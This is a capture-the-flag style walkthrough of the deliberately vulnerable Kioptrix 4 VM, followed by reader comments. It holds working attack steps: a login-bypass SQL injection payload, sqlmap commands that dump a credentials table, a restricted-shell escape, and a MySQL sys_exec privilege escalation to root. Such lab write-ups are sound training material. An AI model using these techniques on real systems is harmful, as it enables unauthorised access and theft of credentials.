Vulnhub – Kioptrix: Level 1.3 (#4)

Part 4 of 5 of the Kioptrix series. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting, and they are similar to the VMs in the PWK course for those working toward the OSCP certification. The point of the game is to find a way to get a root shell on the vulnerable machine. The link to download the VM can be found here. Now let's get started!

NOTE: When extracting the VM, I was only given a vmdk (virtual machine disk), which gave me problems when trying to open it up with VMware. I used a guide called Create Workstation Virtual Machine Using Existing Virtual Disks to help me out.

Description from author:
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

1. It’s possible to get root remotely [ Edit: sorry not what I meant ]

1a. It’s possible to remotely compromise the machine

2. Stays within the target audience of this site

3. Must be “realistic” (well kinda…)

4. Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.

I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.

Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.

I would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug

— A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the image to suit your fusion version.

— Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve tested the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com

Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.

Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys

So I hope you enjoy this one.

The Kioptrix Team

Source: http://www.kioptrix.com/blog/?p=604

**Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive**

The Attack

Kali Linux machine: 192.168.182.147

Scanning and Reconnaissance

Using netdiscover, I found the victim VM at 192.168.182.154.

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

I then ran a SYN scan against the target (without -p, nmap checks its top 1000 ports) and found ports 22, 80, 139 and 445 open!

root@kali:~# nmap -sS -n  192.168.182.154

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-12 19:38 CDT
Nmap scan report for 192.168.182.154
Host is up (0.00034s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:68:B2:1F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 157.82 seconds
root@kali:~#  

Since 139/tcp and 445/tcp are open, let's enumerate SMB with enum4linux to see whether any shares are accessible and which usernames it can pull from the server. enum4linux produces a lot of output; only the useful parts are shown below.

root@kali:~# enum4linux 192.168.182.154
 ========================================= 
|    OS information on 192.168.182.154    |
 ========================================= 
[+] Got OS info for 192.168.182.154 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.182.154 from srvinfo:
	KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	4.9
	server type     :	0x809a03

 ================================ 
|    Users on 192.168.182.154    |
 ================================ 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
 ============================================ 
|    Share Enumeration on 192.168.182.154    |
 ============================================ 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))

	Server               Comment
	---------            -------
	KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

	Workgroup            Master
	---------            -------
	WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.182.154
//192.168.182.154/print$	Mapping: DENIED, Listing: N/A
//192.168.182.154/IPC$	[E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
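A quick sanity check on the user list above, as an added example that is not part of the original writeup: Samba's default algorithmic mapping derives user RIDs from Unix uids as 1000 + 2*uid (group RIDs are 1001 + 2*gid, and RIDs below 1000 are well-known ones such as 501 for the guest account), so the RIDs can be inverted to separate real accounts (uid 1000 and up) from system accounts before spending time on them. It assumes the target uses that default mapping, which the later id output (john is uid 1001, RID 0xbba = 3002) bears out.

```python
import re

# Samba's default algorithmic RID mapping (no idmap backend involved):
#   user  RID = 1000 + 2*uid   (always even)
#   group RID = 1001 + 2*gid   (always odd)
# RIDs below 1000 are well-known, e.g. 501 = guest, which Samba uses for 'nobody'.
ALGORITHMIC_RID_BASE = 1000
RID_MULTIPLIER = 2

# Constructed sample: the user lines copied from the enum4linux output above.
ENUM4LINUX_USERS = """\
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody\tName: nobody\tDesc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert\tName: ,,,\tDesc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root\tName: root\tDesc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john\tName: ,,,\tDesc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret\tName: loneferret,,,\tDesc: (null)
"""

USER_LINE = re.compile(r"RID:\s*(0x[0-9a-fA-F]+)\s+.*?Account:\s*(\S+)")


def rid_to_uid(rid):
    """Invert Samba's algorithmic user-RID mapping.

    Returns None for well-known RIDs (< 1000) and for odd RIDs, which
    belong to groups rather than users under the same scheme.
    """
    if rid < ALGORITHMIC_RID_BASE or (rid - ALGORITHMIC_RID_BASE) % RID_MULTIPLIER != 0:
        return None
    return (rid - ALGORITHMIC_RID_BASE) // RID_MULTIPLIER


def parse_users(text):
    """Yield (account, rid, uid-or-None) for each enum4linux user line."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.search(line)
        if not m:
            continue
        rid = int(m.group(1), 16)
        users.append((m.group(2), rid, rid_to_uid(rid)))
    return users


def classify(users):
    """Split accounts into likely humans (uid >= 1000) and system/well-known ones."""
    humans, system = [], []
    for name, _rid, uid in users:
        (humans if uid is not None and uid >= 1000 else system).append(name)
    return humans, system


if __name__ == "__main__":
    found = parse_users(ENUM4LINUX_USERS)
    for name, rid, uid in found:
        print(f"{name:<12} rid={rid:<5} uid={uid}")
    print("candidates:", classify(found)[0])
```

john, robert and loneferret map to uids 1001, 1002 and 1000, so those are the accounts worth trying passwords against; root maps to uid 0 and nobody sits on the well-known guest RID 501, so neither is a login candidate.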

The target is running Samba 3.0.28a, for which I found no usable public remote exploit, so SMB serves as an enumeration source here rather than an entry point. The enumeration still gave me five account names: root and nobody are system accounts, while robert, john and loneferret look like real users (their RIDs sit in the 3000 range, where Samba's default mapping puts Unix uids of 1000 and above). Anonymous access to both shares (print$ and IPC$) was denied. Next, let's run dirb against the web server.

root@kali:~# dirb http://192.168.182.154

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Mar 12 21:29:00 2017
URL_BASE: http://192.168.182.154/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.182.154/ ----
+ http://192.168.182.154/cgi-bin/ (CODE:403|SIZE:330)                                                                                                                                    
==> DIRECTORY: http://192.168.182.154/images/                                                                                                                                            
+ http://192.168.182.154/index (CODE:200|SIZE:1255)                                                                                                                                      
+ http://192.168.182.154/index.php (CODE:200|SIZE:1255)                                                                                                                                  
==> DIRECTORY: http://192.168.182.154/john/                                                                                                                                              
+ http://192.168.182.154/logout (CODE:302|SIZE:0)                                                                                                                                        
+ http://192.168.182.154/member (CODE:302|SIZE:220)                                                                                                                                      
+ http://192.168.182.154/server-status (CODE:403|SIZE:335)                                                                                                                               
                                                                                                                                                                                         
---- Entering directory: http://192.168.182.154/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                         
---- Entering directory: http://192.168.182.154/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Mar 12 21:29:03 2017
DOWNLOADED: 4612 - FOUND: 6
root@kali:~# 

Useful finds: a listable /john/ directory (matching one of the SMB usernames), a listable /images/ directory, and /member and /logout, which both redirect, so the site has a login-gated member area.

Checking the website, it has a login form. Let's see if it is vulnerable to SQL injection by putting a single quote ' in the username and password fields.

Well, look what we have here! The response to the stray quote shows the input is reaching the SQL query unescaped: it is vulnerable to SQLi!

Exploitation

I will show two ways of getting the two sets of login credentials from the server: first a manual SQL injection, then sqlmap. Both yield the same results; I'm pointing that out so nobody gets confused. Let's get started!

Manual SQLi

Let's try an injection using one of the usernames from the SMB enumeration. I'm starting with john because dirb also found a /john/ directory. I enter john in the username field and 1' or '1'='1 in the password field. The back-end query then looks something like this (table and column names are illustrative):

SELECT * FROM users where username='john' and password='1' or '1'='1' 

It worked! Because AND binds tighter than OR, the database evaluates the WHERE clause as (username='john' AND password='1') OR ('1'='1'), which is true regardless of the real password, so the login succeeds and the application shows me john's credentials: his password is MyNameIsJohn.

The same method with robert gives his credentials as well: his password is ADGAdsafdfwt4gadfga==

Note: you can skip ahead to Escaping restricted shell to continue the pentest, or read SQLi using sqlmap to see the other way I got the credentials.
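The injection above, reproduced as an added example that is not part of the original writeup. It uses an in-memory SQLite table standing in for the site's members table (the table name comes from the sqlmap dump in the next section; the column names are assumptions) to show the string-built query the page describes next to the parameterised fix, plus the single-quote probe that first revealed the bug. SQLite shares MySQL's quoting rules and AND/OR precedence, so the behaviour is the same.

```python
import sqlite3

# Constructed stand-in for the site's members table. Table name as in the
# sqlmap dump; column names are assumed, passwords as shown on the page.
SCHEMA = """
CREATE TABLE members (username TEXT, password TEXT);
INSERT INTO members VALUES ('john',   'MyNameIsJohn');
INSERT INTO members VALUES ('robert', 'ADGAdsafdfwt4gadfga==');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_login(db, username, password):
    """String-built query in the style of the original login check: user input
    is spliced straight into the SQL text, so quotes in it change the query."""
    sql = ("SELECT username, password FROM members "
           f"WHERE username='{username}' AND password='{password}'")
    return db.execute(sql).fetchall()


def safe_login(db, username, password):
    """Parameterised query: values travel separately from the SQL text, so a
    quote in the password is compared as data, never parsed as syntax."""
    sql = "SELECT username, password FROM members WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()


def probe_quote(db):
    """The writeup's first test: a lone quote leaves the statement unbalanced,
    so the vulnerable query raises a database error instead of 'login failed'.
    Returns the error text, or None if the quote was handled cleanly."""
    try:
        vulnerable_login(db, "'", "x")
    except sqlite3.OperationalError as err:
        return str(err)
    return None


if __name__ == "__main__":
    db = make_db()
    print("probe error:", probe_quote(db))
    # AND binds tighter than OR: (username='john' AND password='1') OR ('1'='1')
    print("vulnerable:", vulnerable_login(db, "john", "1' or '1'='1"))
    print("parameterised:", safe_login(db, "john", "1' or '1'='1"))
    print("real password:", safe_login(db, "john", "MyNameIsJohn"))
```

With the tautology payload the string-built query returns every row in the table, which is why the application treats the login as successful and why the same trick also exposed robert's password; the parameterised version returns nothing for the payload and only matches the genuine password.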

SQLi using sqlmap

The error from the single-quote test plus the login form's HTML source (which gives the POST target checklogin.php and the field names myusername and mypassword) is enough to hand the injection over to sqlmap.

The following command lists the databases on the server (the --data string is the POST body, so sqlmap tests both parameters; --level and --risk raise the number of payloads it tries):

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL  --data="myusername=username&mypassword=password" --level=5 --risk=3  --dbs

There are three databases. Let's see what the members database has to offer by listing its tables with the command below.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL  --data="myusername=username&mypassword=password" --level=5 --risk=3  --tables -D members

The only table in the members database is also named members. Let's dump it and see what we get.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --data="myusername=username&mypassword=password"  -D members -T members --dump

BINGO! The dump gives the same two credentials, stored in cleartext, which I will use to SSH into the server.

Escaping restricted shell

root@kali:~# ssh john@192.168.182.154
john@192.168.182.154's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ 

On login I land in a restricted shell (this is lshell, a Python-based restricted shell, despite the LigGoat branding) that allows only the eight commands listed. Since echo is one of them, the well-known lshell escape echo os.system('/bin/bash') is enough to drop into an unrestricted bash. The prompt changing to the normal john@Kioptrix4:~$ confirms the escape:

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ 

Privilege Escalation

Once out of the restricted shell, I ran a few commands to get the lay of the land: the distribution and kernel version (useful for known local exploits) and which processes run as root (useful for misconfigured services).

john@Kioptrix4:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
john@Kioptrix4:~$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
john@Kioptrix4:~$ ps -ef | grep root
root         1     0  0 Mar12 ?        00:00:01 /sbin/init
root         2     0  0 Mar12 ?        00:00:00 [kthreadd]
root         3     2  0 Mar12 ?        00:00:00 [migration/0]
root         4     2  0 Mar12 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 Mar12 ?        00:00:00 [watchdog/0]
root         6     2  0 Mar12 ?        00:00:00 [events/0]
root         7     2  0 Mar12 ?        00:00:00 [khelper]
root        41     2  0 Mar12 ?        00:00:00 [kblockd/0]
root        44     2  0 Mar12 ?        00:00:00 [kacpid]
root        45     2  0 Mar12 ?        00:00:00 [kacpi_notify]
root       170     2  0 Mar12 ?        00:00:00 [kseriod]
root       208     2  0 Mar12 ?        00:00:00 [pdflush]
root       209     2  0 Mar12 ?        00:00:00 [pdflush]
root       210     2  0 Mar12 ?        00:00:00 [kswapd0]
root       252     2  0 Mar12 ?        00:00:00 [aio/0]
root      1468     2  0 Mar12 ?        00:00:00 [ata/0]
root      1471     2  0 Mar12 ?        00:00:00 [ata_aux]
root      1480     2  0 Mar12 ?        00:00:00 [scsi_eh_0]
root      1485     2  0 Mar12 ?        00:00:00 [scsi_eh_1]
root      1498     2  0 Mar12 ?        00:00:00 [ksuspend_usbd]
root      1503     2  0 Mar12 ?        00:00:00 [khubd]
root      2359     2  0 Mar12 ?        00:00:00 [scsi_eh_2]
root      2602     2  0 Mar12 ?        00:00:00 [kjournald]
root      2769     1  0 Mar12 ?        00:00:00 /sbin/udevd --daemon
root      3042     2  0 Mar12 ?        00:00:00 [kgameportd]
root      3212     2  0 Mar12 ?        00:00:00 [kpsmoused]
root      4501     1  0 Mar12 tty4     00:00:00 /sbin/getty 38400 tty4
root      4502     1  0 Mar12 tty5     00:00:00 /sbin/getty 38400 tty5
root      4507     1  0 Mar12 tty2     00:00:00 /sbin/getty 38400 tty2
root      4509     1  0 Mar12 tty3     00:00:00 /sbin/getty 38400 tty3
root      4518     1  0 Mar12 tty6     00:00:00 /sbin/getty 38400 tty6
root      4569     1  0 Mar12 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4590     1  0 Mar12 ?        00:00:00 /usr/sbin/sshd
root      4646     1  0 Mar12 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4688  4646  0 Mar12 ?        00:00:16 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid
root      4690  4646  0 Mar12 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4763     1  0 Mar12 ?        00:00:00 /usr/sbin/nmbd -D
root      4765     1  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4779  4765  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4780     1  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4800  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4812     1  0 Mar12 ?        00:00:00 /usr/sbin/cron
root      4834     1  0 Mar12 ?        00:00:00 /usr/sbin/apache2 -k start
root      4890     1  0 Mar12 tty1     00:00:00 /sbin/getty 38400 tty1
root      4943  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4944  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      5752  4590  0 01:07 ?        00:00:00 sshd: john [priv]
john      5901  5807  0 02:26 pts/0    00:00:00 grep root
john@Kioptrix4:~$ 

The interesting line is mysqld: it is running as root (--user=root on its command line), so anything the database server can be made to execute runs as root as well. Since I have a shell on the box, let's look for the database credentials in the web application's configuration files.

john@Kioptrix4:~$ ls /var/www/
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
john@Kioptrix4:~$ 

The PHP sources in /var/www hold the site's database connection settings, and they show it connects to MySQL as root with an empty password. That gives me two things: the MySQL root account, and a mysqld process that itself runs as OS root. MySQL user-defined functions (UDFs) let a privileged database user load a shared library into the server, and the lib_mysqludf_sys library adds sys_exec and sys_eval functions that run arbitrary OS commands with the privileges of the mysqld process. So MySQL root plus mysqld-as-root equals OS root. The first requirement is that the library is present on the server; whereis shows it is already installed:

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
john@Kioptrix4:~$ 

Let's connect to the MySQL server. Two tutorials helped me understand MySQL UDFs: MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux and Command execution with a MySQL UDF.

john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 98586
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.08 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# whoami
root
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# hostname
Kioptrix4
root@Kioptrix4:/home/john# 

sys_exec was already registered on this server (otherwise it would first have to be created from the shared object with a CREATE FUNCTION ... SONAME statement; the mysql.func table lists what is registered). Through it, usermod ran as root and added john to the admin group. On Ubuntu 8.04 the admin group has full sudo rights in /etc/sudoers, so sudo su with john's own password yields the root shell. sudo reads group membership from the group database rather than only from the session's cached group list, which is why no fresh login was needed for the new membership to count.

Conclusion

This was tougher than the previous level, and when it got tough I turned to the university of Google for some additional help. It took several steps: SQL injection to get credentials, escaping the restricted shell, and MySQL UDFs to escalate to the desired root shell. If you have any questions or enjoyed the read, leave some feedback below! That's it for this level. Now on to the last one!

8 comments

  1. Thanks mate for the clear explanations. I was actually lost in the wild; I took the OSCP lab for 30 days and was able to crack only 4 systems. I don’t have any experience in pentesting. 🙁 I want to do this, but have no guidance; if you can help me with how to go about it, any procedure would be helpful. I can practice VMs on my own and start taking the OSCP lab again. In Kioptrix 4, after getting the shell you used MySQL to escalate privileges; how did you think of it? I have such questions doing rounds in my head. Please let me know if you can help with any VM and how to go about cracking it. Please, and thank you so much for the clear tutorial; it made me understand many things. 😀

    1. Well, how I got started in pentesting was reading Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman. That book is a great start, and the author has videos about pentesting on cybrary.it. Check out Cybrary’s Advanced Penetration Testing. These videos go hand in hand with the book and are extremely helpful. I still haven’t finished the whole book because of school, but I highly recommend it. Another book on my list is The Hacker Playbook 2: Practical Guide to Penetration Testing. Those 2 books and Cybrary are more than enough to get started in pentesting. Regarding Kioptrix 4, when I got the shell I used a guide called Basic Linux Privilege Escalation, which helps by running several commands to see if I can find any useful info to escalate my privileges. Specifically with MySQL, I remembered reading a while back about using user-defined functions in MySQL to escalate privileges, so when I checked which processes were running as root and found MySQL in the list, I knew what to do from there. Hope that helps in any way. Sorry for the late reply; I had finals this week and am currently in the National Cyber League (which I recommend you try), so that was taking a good amount of my time. I’m glad I could help you with Kioptrix 4. If you have any other questions or need help with anything else, just let me know.

  2. Thanks bro, thank you so much for taking the time to respond. Sure, I’ll go through the books & videos and also the “National Cyber League” once I’m confident in myself. Huh, yes, you helped me with “how to think” :D. If I need anything I’ll surely reach out to you for help 🙂

    1. Anytime. The last few weeks have been hectic, but now I have time, so if you have any questions, just let me know. I’ll be happy to help. Yeah, I should’ve stated that I knew how to get privilege escalation from MySQL because of prior experience dealing with MySQL user-defined functions. So yeah, just let me know if you have any questions about anything else. I will write more write-ups since I now have more time on my hands.

      1. Thanks, waiting for more write-ups on other VMs from you. By now I’ve completed practicing all the VMs mentioned here and, as you said, am now going through the pentesting course on Cybrary.

        1. Yeah, it’s been a LONG while since I’ve done a write-up. Been real busy. I want my write-ups to be very thorough and that takes A LOT of time. Been learning x86 to learn more about reverse engineering, but I think I might do a write-up soon. Haven’t decided yet. Might look into Metasploitable 3 or just another VM similar to the PWK course.
